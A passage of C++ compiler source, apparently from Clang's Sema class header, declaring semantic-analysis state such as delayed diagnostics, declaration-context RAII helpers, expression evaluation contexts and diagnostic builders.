/// Store a set of either DeclRefExprs or MemberExprs that contain a reference
/// to a variable (constant) that may or may not be odr-used in this Expr, and
/// we won't know until all lvalue-to-rvalue and discarded value conversions
/// have been applied to all subexpressions of the enclosing full expression.
/// This is cleared at the end of each full expression.
using MaybeODRUseExprSet = llvm::SmallPtrSet<Expr *, 2>;
MaybeODRUseExprSet MaybeODRUseExprs;
std::unique_ptr<sema::FunctionScopeInfo> CachedFunctionScope;
/// Stack containing information about each of the nested
/// function, block, and method scopes that are currently active.
SmallVector<sema::FunctionScopeInfo *, 4> FunctionScopes;
typedef LazyVector<TypedefNameDecl *, ExternalSemaSource,
&ExternalSemaSource::ReadExtVectorDecls, 2, 2>
ExtVectorDeclsType;
/// ExtVectorDecls - This is a list of all the extended vector types. This allows
/// us to associate a raw vector type with one of the ext_vector type names.
/// This is only necessary for issuing pretty diagnostics.
ExtVectorDeclsType ExtVectorDecls;
/// FieldCollector - Collects CXXFieldDecls during parsing of C++ classes.
std::unique_ptr<CXXFieldCollector> FieldCollector;
typedef llvm::SmallSetVector<NamedDecl *, 16> NamedDeclSetType;
/// Set containing all declared private fields that are not used.
NamedDeclSetType UnusedPrivateFields;
/// Set containing all typedefs that are likely unused.
llvm::SmallSetVector<const TypedefNameDecl *, 4>
UnusedLocalTypedefNameCandidates;
/// Delete-expressions to be analyzed at the end of the translation unit.
///
/// This list contains class members and the locations of delete-expressions
/// for which it could not be proven whether they mismatch the new-expression
/// used in the initializer of the field.
typedef std::pair<SourceLocation, bool> DeleteExprLoc;
typedef llvm::SmallVector<DeleteExprLoc, 4> DeleteLocs;
llvm::MapVector<FieldDecl *, DeleteLocs> DeleteExprs;
typedef llvm::SmallPtrSet<const CXXRecordDecl*, 8> RecordDeclSetTy;
/// PureVirtualClassDiagSet - a set of class declarations which we have
/// emitted a list of pure virtual functions. Used to prevent emitting the
/// same list more than once.
std::unique_ptr<RecordDeclSetTy> PureVirtualClassDiagSet;
/// ParsingInitForAutoVars - a set of declarations with auto types for which
/// we are currently parsing the initializer.
llvm::SmallPtrSet<const Decl*, 4> ParsingInitForAutoVars;
/// Look for a locally scoped extern "C" declaration by the given name.
NamedDecl *findLocallyScopedExternCDecl(DeclarationName Name);
typedef LazyVector<VarDecl *, ExternalSemaSource,
&ExternalSemaSource::ReadTentativeDefinitions, 2, 2>
TentativeDefinitionsType;
/// All the tentative definitions encountered in the TU.
TentativeDefinitionsType TentativeDefinitions;
/// All the external declarations encountered and used in the TU.
SmallVector<VarDecl *, 4> ExternalDeclarations;
typedef LazyVector<const DeclaratorDecl *, ExternalSemaSource,
&ExternalSemaSource::ReadUnusedFileScopedDecls, 2, 2>
UnusedFileScopedDeclsType;
/// The set of file scoped decls seen so far that have not been used
/// and must warn if not used. Only contains the first declaration.
UnusedFileScopedDeclsType UnusedFileScopedDecls;
typedef LazyVector<CXXConstructorDecl *, ExternalSemaSource,
&ExternalSemaSource::ReadDelegatingConstructors, 2, 2>
DelegatingCtorDeclsType;
/// All the delegating constructors seen so far in the file, used for
/// cycle detection at the end of the TU.
DelegatingCtorDeclsType DelegatingCtorDecls;
/// All the overriding functions seen during a class definition
/// that had their exception spec checks delayed, plus the overridden
/// function.
SmallVector<std::pair<const CXXMethodDecl*, const CXXMethodDecl*>, 2>
DelayedOverridingExceptionSpecChecks;
/// All the function redeclarations seen during a class definition that had
/// their exception spec checks delayed, plus the prior declaration they
/// should be checked against. Except during error recovery, the new decl
/// should always be a friend declaration, as that's the only valid way to
/// redeclare a special member before its class is complete.
SmallVector<std::pair<FunctionDecl*, FunctionDecl*>, 2>
DelayedEquivalentExceptionSpecChecks;
typedef llvm::MapVector<const FunctionDecl *,
std::unique_ptr<LateParsedTemplate>>
LateParsedTemplateMapT;
LateParsedTemplateMapT LateParsedTemplateMap;
/// Callback to the parser to parse templated functions when needed.
typedef void LateTemplateParserCB(void *P, LateParsedTemplate &LPT);
typedef void LateTemplateParserCleanupCB(void *P);
LateTemplateParserCB *LateTemplateParser;
LateTemplateParserCleanupCB *LateTemplateParserCleanup;
void *OpaqueParser;
void SetLateTemplateParser(LateTemplateParserCB *LTP,
LateTemplateParserCleanupCB *LTPCleanup,
void *P) {
LateTemplateParser = LTP;
LateTemplateParserCleanup = LTPCleanup;
OpaqueParser = P;
}
/// \brief Callback to the parser to parse a type expressed as a string.
std::function<TypeResult(StringRef, StringRef, SourceLocation)>
ParseTypeFromStringCallback;
class DelayedDiagnostics;
class DelayedDiagnosticsState {
sema::DelayedDiagnosticPool *SavedPool;
friend class Sema::DelayedDiagnostics;
};
typedef DelayedDiagnosticsState ParsingDeclState;
typedef DelayedDiagnosticsState ProcessingContextState;
/// A class which encapsulates the logic for delaying diagnostics
/// during parsing and other processing.
class DelayedDiagnostics {
/// The current pool of diagnostics into which delayed
/// diagnostics should go.
sema::DelayedDiagnosticPool *CurPool;
public:
DelayedDiagnostics() : CurPool(nullptr) {}
/// Adds a delayed diagnostic.
void add(const sema::DelayedDiagnostic &diag); // in DelayedDiagnostic.h
/// Determines whether diagnostics should be delayed.
bool shouldDelayDiagnostics() { return CurPool != nullptr; }
/// Returns the current delayed-diagnostics pool.
sema::DelayedDiagnosticPool *getCurrentPool() const {
return CurPool;
}
/// Enter a new scope. Access and deprecation diagnostics will be
/// collected in this pool.
DelayedDiagnosticsState push(sema::DelayedDiagnosticPool &pool) {
DelayedDiagnosticsState state;
state.SavedPool = CurPool;
CurPool = &pool;
return state;
}
/// Leave a delayed-diagnostic state that was previously pushed.
/// Do not emit any of the diagnostics. This is performed as part
/// of the bookkeeping of popping a pool "properly".
void popWithoutEmitting(DelayedDiagnosticsState state) {
CurPool = state.SavedPool;
}
/// Enter a new scope where access and deprecation diagnostics are
/// not delayed.
DelayedDiagnosticsState pushUndelayed() {
DelayedDiagnosticsState state;
state.SavedPool = CurPool;
CurPool = nullptr;
return state;
}
/// Undo a previous pushUndelayed().
void popUndelayed(DelayedDiagnosticsState state) {
assert(CurPool == nullptr);
CurPool = state.SavedPool;
}
} DelayedDiagnostics;
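// Editorial usage sketch (assumes sema::DelayedDiagnosticPool has a
// parent-pool constructor): collect diagnostics while parsing a declaration,
// then drop them without emitting if the declaration turns out to be invalid.
//
//   sema::DelayedDiagnosticPool Pool(DelayedDiagnostics.getCurrentPool());
//   DelayedDiagnosticsState State = DelayedDiagnostics.push(Pool);
//   ... parse the declaration ...
//   DelayedDiagnostics.popWithoutEmitting(State);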
/// A RAII object to temporarily push a declaration context.
class ContextRAII {
private:
Sema &S;
DeclContext *SavedContext;
ProcessingContextState SavedContextState;
QualType SavedCXXThisTypeOverride;
public:
ContextRAII(Sema &S, DeclContext *ContextToPush, bool NewThisContext = true)
: S(S), SavedContext(S.CurContext),
SavedContextState(S.DelayedDiagnostics.pushUndelayed()),
SavedCXXThisTypeOverride(S.CXXThisTypeOverride)
{
assert(ContextToPush && "pushing null context");
S.CurContext = ContextToPush;
if (NewThisContext)
S.CXXThisTypeOverride = QualType();
}
void pop() {
if (!SavedContext) return;
S.CurContext = SavedContext;
S.DelayedDiagnostics.popUndelayed(SavedContextState);
S.CXXThisTypeOverride = SavedCXXThisTypeOverride;
SavedContext = nullptr;
}
~ContextRAII() {
pop();
}
};
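// Editorial usage sketch (hypothetical DeclContext `RD`): enter a context for
// the duration of a scope; the destructor (or an early pop()) restores the
// previous CurContext and its delayed-diagnostics state.
//
//   {
//     ContextRAII SavedContext(*this, RD);
//     ... act inside RD ...
//   } // previous context restored here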
/// Used to change context to isConstantEvaluated without pushing a heavy
/// ExpressionEvaluationContextRecord object.
bool isConstantEvaluatedOverride;
bool isConstantEvaluated() {
return ExprEvalContexts.back().isConstantEvaluated() ||
isConstantEvaluatedOverride;
}
/// RAII object to handle the state changes required to synthesize
/// a function body.
class SynthesizedFunctionScope {
Sema &S;
Sema::ContextRAII SavedContext;
bool PushedCodeSynthesisContext = false;
public:
SynthesizedFunctionScope(Sema &S, DeclContext *DC)
: S(S), SavedContext(S, DC) {
S.PushFunctionScope();
S.PushExpressionEvaluationContext(
Sema::ExpressionEvaluationContext::PotentiallyEvaluated);
if (auto *FD = dyn_cast<FunctionDecl>(DC))
FD->setWillHaveBody(true);
else
assert(isa<ObjCMethodDecl>(DC));
}
void addContextNote(SourceLocation UseLoc) {
assert(!PushedCodeSynthesisContext);
Sema::CodeSynthesisContext Ctx;
Ctx.Kind = Sema::CodeSynthesisContext::DefiningSynthesizedFunction;
Ctx.PointOfInstantiation = UseLoc;
Ctx.Entity = cast<Decl>(S.CurContext);
S.pushCodeSynthesisContext(Ctx);
PushedCodeSynthesisContext = true;
}
~SynthesizedFunctionScope() {
if (PushedCodeSynthesisContext)
S.popCodeSynthesisContext();
if (auto *FD = dyn_cast<FunctionDecl>(S.CurContext))
FD->setWillHaveBody(false);
S.PopExpressionEvaluationContext();
S.PopFunctionScopeInfo();
}
};
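// Editorial usage sketch (hypothetical FunctionDecl `FD`): set up the scopes
// needed to synthesize a body, and attach a note pointing at the use site.
//
//   SynthesizedFunctionScope Scope(*this, FD);
//   Scope.addContextNote(UseLoc);
//   ... build the body and attach it to FD ...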
/// WeakUndeclaredIdentifiers - Identifiers contained in a
/// \#pragma weak before being declared. Rare; such an identifier may alias
/// another identifier, declared or undeclared.
llvm::MapVector<IdentifierInfo *, WeakInfo> WeakUndeclaredIdentifiers;
/// ExtnameUndeclaredIdentifiers - Identifiers contained in a
/// \#pragma redefine_extname before being declared. Used in Solaris system
/// headers to define functions that occur in multiple standards to call the
/// version in the currently selected standard.
llvm::DenseMap<IdentifierInfo*,AsmLabelAttr*> ExtnameUndeclaredIdentifiers;
/// Load weak undeclared identifiers from the external source.
void LoadExternalWeakUndeclaredIdentifiers();
/// WeakTopLevelDecl - Translation-unit scoped declarations generated by
/// \#pragma weak during processing of other Decls.
/// I couldn't figure out a clean way to generate these in-line, so
/// we store them here and handle separately -- which is a hack.
/// It would be best to refactor this.
SmallVector<Decl*,2> WeakTopLevelDecl;
IdentifierResolver IdResolver;
/// Translation Unit Scope - useful to Objective-C actions that need
/// to lookup file scope declarations in the "ordinary" C decl namespace.
/// For example, user-defined classes, built-in "id" type, etc.
Scope *TUScope;
/// The C++ "std" namespace, where the standard library resides.
LazyDeclPtr StdNamespace;
/// The C++ "std::bad_alloc" class, which is defined by the C++
/// standard library.
LazyDeclPtr StdBadAlloc;
/// The C++ "std::align_val_t" enum class, which is defined by the C++
/// standard library.
LazyDeclPtr StdAlignValT;
/// The C++ "std::experimental" namespace, where the experimental parts
/// of the standard library reside.
NamespaceDecl *StdExperimentalNamespaceCache;
/// The C++ "std::initializer_list" template, which is defined in
/// \<initializer_list>.
ClassTemplateDecl *StdInitializerList;
/// The C++ "std::coroutine_traits" template, which is defined in
/// \<coroutine_traits>
ClassTemplateDecl *StdCoroutineTraitsCache;
/// The C++ "type_info" declaration, which is defined in \<typeinfo>.
RecordDecl *CXXTypeInfoDecl;
/// The MSVC "_GUID" struct, which is defined in MSVC header files.
RecordDecl *MSVCGuidDecl;
/// Caches identifiers/selectors for NSFoundation APIs.
std::unique_ptr<NSAPI> NSAPIObj;
/// The declaration of the Objective-C NSNumber class.
ObjCInterfaceDecl *NSNumberDecl;
/// The declaration of the Objective-C NSValue class.
ObjCInterfaceDecl *NSValueDecl;
/// Pointer to NSNumber type (NSNumber *).
QualType NSNumberPointer;
/// Pointer to NSValue type (NSValue *).
QualType NSValuePointer;
/// The Objective-C NSNumber methods used to create NSNumber literals.
ObjCMethodDecl *NSNumberLiteralMethods[NSAPI::NumNSNumberLiteralMethods];
/// The declaration of the Objective-C NSString class.
ObjCInterfaceDecl *NSStringDecl;
/// Pointer to NSString type (NSString *).
QualType NSStringPointer;
/// The declaration of the stringWithUTF8String: method.
ObjCMethodDecl *StringWithUTF8StringMethod;
/// The declaration of the valueWithBytes:objCType: method.
ObjCMethodDecl *ValueWithBytesObjCTypeMethod;
/// The declaration of the Objective-C NSArray class.
ObjCInterfaceDecl *NSArrayDecl;
/// The declaration of the arrayWithObjects:count: method.
ObjCMethodDecl *ArrayWithObjectsMethod;
/// The declaration of the Objective-C NSDictionary class.
ObjCInterfaceDecl *NSDictionaryDecl;
/// The declaration of the dictionaryWithObjects:forKeys:count: method.
ObjCMethodDecl *DictionaryWithObjectsMethod;
/// id<NSCopying> type.
QualType QIDNSCopying;
/// will hold 'respondsToSelector:'
Selector RespondsToSelectorSel;
/// A flag to remember whether the implicit forms of operator new and delete
/// have been declared.
bool GlobalNewDeleteDeclared;
/// A flag to indicate that we're in a context that permits abstract
/// references to fields, such as MS-style inline assembly.
bool AllowAbstractFieldReference;
/// Describes how the expressions currently being parsed are
/// evaluated at run-time, if at all.
enum class ExpressionEvaluationContext {
/// The current expression and its subexpressions occur within an
/// unevaluated operand (C++11 [expr]p7), such as the subexpression of
/// \c sizeof, where the type of the expression may be significant but
/// no code will be generated to evaluate the value of the expression at
/// run time.
Unevaluated,
/// The current expression occurs within a braced-init-list within
/// an unevaluated operand. This is mostly like a regular unevaluated
/// context, except that we still instantiate constexpr functions that are
/// referenced here so that we can perform narrowing checks correctly.
UnevaluatedList,
/// The current expression occurs within a discarded statement.
/// This behaves largely similarly to an unevaluated operand in preventing
/// definitions from being required, but not in other ways.
DiscardedStatement,
/// The current expression occurs within an unevaluated
/// operand that unconditionally permits abstract references to
/// fields, such as a SIZE operator in MS-style inline assembly.
UnevaluatedAbstract,
/// The current context is "potentially evaluated" in C++11 terms,
/// but the expression is evaluated at compile-time (like the values of
/// cases in a switch statement).
ConstantEvaluated,
/// The current expression is potentially evaluated at run time,
/// which means that code may be generated to evaluate the value of the
/// expression at run time.
PotentiallyEvaluated,
/// The current expression is potentially evaluated, but any
/// declarations referenced inside that expression are only used if
/// in fact the current expression is used.
///
/// This value is used when parsing default function arguments, for which
/// we would like to provide diagnostics (e.g., passing non-POD arguments
/// through varargs) but do not want to mark declarations as "referenced"
/// until the default argument is used.
PotentiallyEvaluatedIfUsed
};
/// Data structure used to record current or nested
/// expression evaluation contexts.
struct ExpressionEvaluationContextRecord {
/// The expression evaluation context.
ExpressionEvaluationContext Context;
/// Whether the enclosing context needed a cleanup.
CleanupInfo ParentCleanup;
/// Whether we are in a decltype expression.
bool IsDecltype;
/// The number of active cleanup objects when we entered
/// this expression evaluation context.
unsigned NumCleanupObjects;
/// The number of typos encountered during this expression evaluation
/// context (i.e. the number of TypoExprs created).
unsigned NumTypos;
MaybeODRUseExprSet SavedMaybeODRUseExprs;
/// The lambdas that are present within this context, if it
/// is indeed an unevaluated context.
SmallVector<LambdaExpr *, 2> Lambdas;
/// The declaration that provides context for lambda expressions
/// and block literals if the normal declaration context does not
/// suffice, e.g., in a default function argument.
Decl *ManglingContextDecl;
/// If we are processing a decltype type, a set of call expressions
/// for which we have deferred checking the completeness of the return type.
SmallVector<CallExpr *, 8> DelayedDecltypeCalls;
/// If we are processing a decltype type, a set of temporary binding
/// expressions for which we have deferred checking the destructor.
SmallVector<CXXBindTemporaryExpr *, 8> DelayedDecltypeBinds;
llvm::SmallPtrSet<const Expr *, 8> PossibleDerefs;
/// Expressions appearing as the LHS of a volatile assignment in this
/// context. We produce a warning for these when popping the context if
/// they are not discarded-value expressions nor unevaluated operands.
SmallVector<Expr*, 2> VolatileAssignmentLHSs;
/// \brief Describes whether we are in an expression context which we have
/// to handle differently.
enum ExpressionKind {
EK_Decltype, EK_TemplateArgument, EK_Other
} ExprContext;
ExpressionEvaluationContextRecord(ExpressionEvaluationContext Context,
unsigned NumCleanupObjects,
CleanupInfo ParentCleanup,
Decl *ManglingContextDecl,
ExpressionKind ExprContext)
: Context(Context), ParentCleanup(ParentCleanup),
NumCleanupObjects(NumCleanupObjects), NumTypos(0),
ManglingContextDecl(ManglingContextDecl), ExprContext(ExprContext) {}
bool isUnevaluated() const {
return Context == ExpressionEvaluationContext::Unevaluated ||
Context == ExpressionEvaluationContext::UnevaluatedAbstract ||
Context == ExpressionEvaluationContext::UnevaluatedList;
}
bool isConstantEvaluated() const {
return Context == ExpressionEvaluationContext::ConstantEvaluated;
}
};
/// A stack of expression evaluation contexts.
SmallVector<ExpressionEvaluationContextRecord, 8> ExprEvalContexts;
/// Emit a warning for all pending noderef expressions that we recorded.
void WarnOnPendingNoDerefs(ExpressionEvaluationContextRecord &Rec);
/// Compute the mangling number context for a lambda expression or
/// block literal. Also return the extra mangling decl if any.
///
/// \param DC - The DeclContext containing the lambda expression or
/// block literal.
std::tuple<MangleNumberingContext *, Decl *>
getCurrentMangleNumberContext(const DeclContext *DC);
/// SpecialMemberOverloadResult - The overloading result for a special member
/// function.
///
/// This is basically a wrapper around PointerIntPair. The lowest bits of the
/// integer are used to determine whether overload resolution succeeded.
class SpecialMemberOverloadResult {
public:
enum Kind {
NoMemberOrDeleted,
Ambiguous,
Success
};
private:
llvm::PointerIntPair<CXXMethodDecl*, 2> Pair;
public:
SpecialMemberOverloadResult() : Pair() {}
SpecialMemberOverloadResult(CXXMethodDecl *MD)
: Pair(MD, MD->isDeleted() ? NoMemberOrDeleted : Success) {}
CXXMethodDecl *getMethod() const { return Pair.getPointer(); }
void setMethod(CXXMethodDecl *MD) { Pair.setPointer(MD); }
Kind getKind() const { return static_cast<Kind>(Pair.getInt()); }
void setKind(Kind K) { Pair.setInt(K); }
};
class SpecialMemberOverloadResultEntry
: public llvm::FastFoldingSetNode,
public SpecialMemberOverloadResult {
public:
SpecialMemberOverloadResultEntry(const llvm::FoldingSetNodeID &ID)
: FastFoldingSetNode(ID)
{}
};
/// A cache of special member function overload resolution results
/// for C++ records.
llvm::FoldingSet<SpecialMemberOverloadResultEntry> SpecialMemberCache;
/// A cache of the flags available in enumerations with the flag_bits
/// attribute.
mutable llvm::DenseMap<const EnumDecl*, llvm::APInt> FlagBitsCache;
/// The kind of translation unit we are processing.
///
/// When we're processing a complete translation unit, Sema will perform
/// end-of-translation-unit semantic tasks (such as creating
/// initializers for tentative definitions in C) once parsing has
/// completed. Modules and precompiled headers perform different kinds of
/// checks.
TranslationUnitKind TUKind;
llvm::BumpPtrAllocator BumpAlloc;
/// The number of SFINAE diagnostics that have been trapped.
unsigned NumSFINAEErrors;
typedef llvm::DenseMap<ParmVarDecl *, llvm::TinyPtrVector<ParmVarDecl *>>
UnparsedDefaultArgInstantiationsMap;
/// A mapping from parameters with unparsed default arguments to the
/// set of instantiations of each parameter.
///
/// This mapping is a temporary data structure used when parsing
/// nested class templates or nested classes of class templates,
/// where we might end up instantiating an inner class before the
/// default arguments of its methods have been parsed.
UnparsedDefaultArgInstantiationsMap UnparsedDefaultArgInstantiations;
// Contains the locations of the beginning of unparsed default
// argument locations.
llvm::DenseMap<ParmVarDecl *, SourceLocation> UnparsedDefaultArgLocs;
/// UndefinedButUsed - all the used, undefined objects which require a
/// definition in this translation unit.
llvm::MapVector<NamedDecl *, SourceLocation> UndefinedButUsed;
/// Determine if VD, which must be a variable or function, is an external
/// symbol that nonetheless can't be referenced from outside this translation
/// unit because its type has no linkage and it's not extern "C".
bool isExternalWithNoLinkageType(ValueDecl *VD);
/// Obtain a sorted list of functions that are undefined but ODR-used.
void getUndefinedButUsed(
SmallVectorImpl<std::pair<NamedDecl *, SourceLocation> > &Undefined);
/// Retrieves list of suspicious delete-expressions that will be checked at
/// the end of translation unit.
const llvm::MapVector<FieldDecl *, DeleteLocs> &
getMismatchingDeleteExpressions() const;
typedef std::pair<ObjCMethodList, ObjCMethodList> GlobalMethods;
typedef llvm::DenseMap<Selector, GlobalMethods> GlobalMethodPool;
/// Method Pool - allows efficient lookup when typechecking messages to "id".
/// We need to maintain a list, since selectors can have differing signatures
/// across classes. In Cocoa, this happens to be extremely uncommon (only 1%
/// of selectors are "overloaded").
/// At the head of the list it is recorded whether there were 0, 1, or >= 2
/// methods inside categories with a particular selector.
GlobalMethodPool MethodPool;
/// Method selectors used in a \@selector expression. Used for implementation
/// of -Wselector.
llvm::MapVector<Selector, SourceLocation> ReferencedSelectors;
/// List of SourceLocations where 'self' is implicitly retained inside a
/// block.
llvm::SmallVector<std::pair<SourceLocation, const BlockDecl *>, 1>
ImplicitlyRetainedSelfLocs;
/// Kinds of C++ special members.
enum CXXSpecialMember {
CXXDefaultConstructor,
CXXCopyConstructor,
CXXMoveConstructor,
CXXCopyAssignment,
CXXMoveAssignment,
CXXDestructor,
CXXInvalid
};
typedef llvm::PointerIntPair<CXXRecordDecl *, 3, CXXSpecialMember>
SpecialMemberDecl;
/// The C++ special members which we are currently in the process of
/// declaring. If this process recursively triggers the declaration of the
/// same special member, we should act as if it is not yet declared.
llvm::SmallPtrSet<SpecialMemberDecl, 4> SpecialMembersBeingDeclared;
/// Kinds of defaulted comparison operator functions.
enum class DefaultedComparisonKind : unsigned char {
/// This is not a defaultable comparison operator.
None,
/// This is an operator== that should be implemented as a series of
/// subobject comparisons.
Equal,
/// This is an operator<=> that should be implemented as a series of
/// subobject comparisons.
ThreeWay,
/// This is an operator!= that should be implemented as a rewrite in terms
/// of a == comparison.
NotEqual,
/// This is an <, <=, >, or >= that should be implemented as a rewrite in
/// terms of a <=> comparison.
Relational,
};
/// The function definitions which were renamed as part of typo-correction
/// to match their respective declarations. We want to keep track of them
/// to ensure that we don't emit a "redefinition" error if we encounter a
/// correctly named definition after the renamed definition.
llvm::SmallPtrSet<const NamedDecl *, 4> TypoCorrectedFunctionDefinitions;
/// Stack of types that correspond to the parameter entities that are
/// currently being copy-initialized. Can be empty.
llvm::SmallVector<QualType, 4> CurrentParameterCopyTypes;
void ReadMethodPool(Selector Sel);
void updateOutOfDateSelector(Selector Sel);
/// Private Helper predicate to check for 'self'.
bool isSelfExpr(Expr *RExpr);
bool isSelfExpr(Expr *RExpr, const ObjCMethodDecl *Method);
/// Cause the active diagnostic on the DiagnosticsEngine to be
/// emitted. This is closely coupled to the SemaDiagnosticBuilder class and
/// should not be used elsewhere.
void EmitCurrentDiagnostic(unsigned DiagID);
/// Records and restores the FP_CONTRACT state on entry/exit of compound
/// statements.
class FPContractStateRAII {
public:
FPContractStateRAII(Sema &S) : S(S), OldFPFeaturesState(S.FPFeatures) {}
~FPContractStateRAII() { S.FPFeatures = OldFPFeaturesState; }
private:
Sema& S;
FPOptions OldFPFeaturesState;
};
void addImplicitTypedef(StringRef Name, QualType T);
bool WarnedStackExhausted = false;
public:
Sema(Preprocessor &pp, ASTContext &ctxt, ASTConsumer &consumer,
TranslationUnitKind TUKind = TU_Complete,
CodeCompleteConsumer *CompletionConsumer = nullptr);
~Sema();
/// Perform initialization that occurs after the parser has been
/// initialized but before it parses anything.
void Initialize();
const LangOptions &getLangOpts() const { return LangOpts; }
OpenCLOptions &getOpenCLOptions() { return OpenCLFeatures; }
FPOptions &getFPOptions() { return FPFeatures; }
DiagnosticsEngine &getDiagnostics() const { return Diags; }
SourceManager &getSourceManager() const { return SourceMgr; }
Preprocessor &getPreprocessor() const { return PP; }
ASTContext &getASTContext() const { return Context; }
ASTConsumer &getASTConsumer() const { return Consumer; }
ASTMutationListener *getASTMutationListener() const;
ExternalSemaSource* getExternalSource() const { return ExternalSource; }
/// Registers an external source. If an external source already exists,
/// creates a multiplex external source and appends to it.
///
/// \param[in] E - A non-null external sema source.
///
void addExternalSource(ExternalSemaSource *E);
void PrintStats() const;
/// Warn that the stack is nearly exhausted.
void warnStackExhausted(SourceLocation Loc);
/// Run some code with "sufficient" stack space. (Currently, at least 256K is
/// guaranteed). Produces a warning if we're low on stack space and allocates
/// more in that case. Use this in code that may recurse deeply (for example,
/// in template instantiation) to avoid stack overflow.
void runWithSufficientStackSpace(SourceLocation Loc,
llvm::function_ref<void()> Fn);
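// Editorial usage sketch (hypothetical recursive step): guard code that can
// recurse deeply, e.g. during template instantiation.
//
//   runWithSufficientStackSpace(PointOfInstantiation, [&] {
//     Result = instantiateDeeply(TD); // hypothetical deeply recursive call
//   });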
/// Helper class that creates diagnostics with optional
/// template instantiation stacks.
///
/// This class provides a wrapper around the basic DiagnosticBuilder
/// class that emits diagnostics. SemaDiagnosticBuilder is
/// responsible for emitting the diagnostic (as DiagnosticBuilder
/// does) and, if the diagnostic comes from inside a template
/// instantiation, printing the template instantiation stack as
/// well.
class SemaDiagnosticBuilder : public DiagnosticBuilder {
Sema &SemaRef;
unsigned DiagID;
public:
SemaDiagnosticBuilder(DiagnosticBuilder &DB, Sema &SemaRef, unsigned DiagID)
: DiagnosticBuilder(DB), SemaRef(SemaRef), DiagID(DiagID) { }
// This is a cunning lie. DiagnosticBuilder actually performs move
// construction in its copy constructor (but due to varied uses, it's not
// possible to conveniently express this as actual move construction). So
// the default copy ctor here is fine, because the base class disables the
// source anyway, so the user-defined ~SemaDiagnosticBuilder is a safe no-op
// in that case anyway.
SemaDiagnosticBuilder(const SemaDiagnosticBuilder&) = default;
~SemaDiagnosticBuilder() {
// If we aren't active, there is nothing to do.
if (!isActive()) return;
// Otherwise, we need to emit the diagnostic. First flush the underlying
// DiagnosticBuilder data, and clear the diagnostic builder itself so it
// won't emit the diagnostic in its own destructor.
//
// This seems wasteful, in that as written the DiagnosticBuilder dtor will
// do its own needless checks to see if the diagnostic needs to be
// emitted. However, because we take care to ensure that the builder
// objects never escape, a sufficiently smart compiler will be able to
// eliminate that code.
FlushCounts();
Clear();
// Dispatch to Sema to emit the diagnostic.
SemaRef.EmitCurrentDiagnostic(DiagID);
}
/// Teach operator<< to produce an object of the correct type.
template<typename T>
friend const SemaDiagnosticBuilder &operator<<(
const SemaDiagnosticBuilder &Diag, const T &Value) {
const DiagnosticBuilder &BaseDiag = Diag;
BaseDiag << Value;
return Diag;
}
};
/// Emit a diagnostic.
SemaDiagnosticBuilder Diag(SourceLocation Loc, unsigned DiagID) {
DiagnosticBuilder DB = Diags.Report(Loc, DiagID);
return SemaDiagnosticBuilder(DB, *this, DiagID);
}
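// Editorial usage sketch: the returned builder streams arguments exactly like
// DiagnosticBuilder and emits on destruction, adding the template
// instantiation stack when applicable (the diagnostic ID is illustrative).
//
//   Diag(OpLoc, diag::err_typecheck_invalid_operands) << LHSTy << RHSTy;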
/// Emit a partial diagnostic.
SemaDiagnosticBuilder Diag(SourceLocation Loc, const PartialDiagnostic& PD);
/// Build a partial diagnostic.
PartialDiagnostic PDiag(unsigned DiagID = 0); // in SemaInternal.h
bool findMacroSpelling(SourceLocation &loc, StringRef name);
/// Get a string to suggest for zero-initialization of a type.
std::string
getFixItZeroInitializerForType(QualType T, SourceLocation Loc) const;
std::string getFixItZeroLiteralForType(QualType T, SourceLocation Loc) const;
/// Calls \c Lexer::getLocForEndOfToken()
SourceLocation getLocForEndOfToken(SourceLocation Loc, unsigned Offset = 0);
/// Retrieve the module loader associated with the preprocessor.
ModuleLoader &getModuleLoader() const;
void emitAndClearUnusedLocalTypedefWarnings();
enum TUFragmentKind {
/// The global module fragment, between 'module;' and a module-declaration.
Global,
/// A normal translation unit fragment. For a non-module unit, this is the
/// entire translation unit. Otherwise, it runs from the module-declaration
/// to the private-module-fragment (if any) or the end of the TU (if not).
Normal,
/// The private module fragment, between 'module :private;' and the end of
/// the translation unit.
Private
};
void ActOnStartOfTranslationUnit();
void ActOnEndOfTranslationUnit();
void ActOnEndOfTranslationUnitFragment(TUFragmentKind Kind);
void CheckDelegatingCtorCycles();
Scope *getScopeForContext(DeclContext *Ctx);
void PushFunctionScope();
void PushBlockScope(Scope *BlockScope, BlockDecl *Block);
sema::LambdaScopeInfo *PushLambdaScope();
/// This is used to inform Sema what the current TemplateParameterDepth
/// is during Parsing. Currently it is used to pass on the depth
/// when parsing generic lambda 'auto' parameters.
void RecordParsingTemplateParameterDepth(unsigned Depth);
void PushCapturedRegionScope(Scope *RegionScope, CapturedDecl *CD,
RecordDecl *RD, CapturedRegionKind K,
unsigned OpenMPCaptureLevel = 0);
/// Custom deleter to allow FunctionScopeInfos to be kept alive for a short
/// time after they've been popped.
class PoppedFunctionScopeDeleter {
Sema *Self;
public:
explicit PoppedFunctionScopeDeleter(Sema *Self) : Self(Self) {}
void operator()(sema::FunctionScopeInfo *Scope) const;
};
using PoppedFunctionScopePtr =
std::unique_ptr<sema::FunctionScopeInfo, PoppedFunctionScopeDeleter>;
PoppedFunctionScopePtr
PopFunctionScopeInfo(const sema::AnalysisBasedWarnings::Policy *WP = nullptr,
const Decl *D = nullptr,
QualType BlockType = QualType());
sema::FunctionScopeInfo *getCurFunction() const {
return FunctionScopes.empty() ? nullptr : FunctionScopes.back();
}
sema::FunctionScopeInfo *getEnclosingFunction() const;
void setFunctionHasBranchIntoScope();
void setFunctionHasBranchProtectedScope();
void setFunctionHasIndirectGoto();
void PushCompoundScope(bool IsStmtExpr);
void PopCompoundScope();
sema::CompoundScopeInfo &getCurCompoundScope() const;
bool hasAnyUnrecoverableErrorsInThisFunction() const;
/// Retrieve the current block, if any.
sema::BlockScopeInfo *getCurBlock();
/// Get the innermost lambda enclosing the current location, if any. This
/// looks through intervening non-lambda scopes such as local functions and
/// blocks.
sema::LambdaScopeInfo *getEnclosingLambda() const;
/// Retrieve the current lambda scope info, if any.
/// \param IgnoreNonLambdaCapturingScope true if we should find the top-most
/// lambda scope info, ignoring all inner capturing scopes that are not
/// lambda scopes.
sema::LambdaScopeInfo *
getCurLambda(bool IgnoreNonLambdaCapturingScope = false);
/// Retrieve the current generic lambda info, if any.
sema::LambdaScopeInfo *getCurGenericLambda();
/// Retrieve the current captured region, if any.
sema::CapturedRegionScopeInfo *getCurCapturedRegion();
/// WeakTopLevelDeclDecls - access to \#pragma weak-generated Decls
SmallVectorImpl<Decl *> &WeakTopLevelDecls() { return WeakTopLevelDecl; }
void ActOnComment(SourceRange Comment);
//===--------------------------------------------------------------------===//
// Type Analysis / Processing: SemaType.cpp.
//
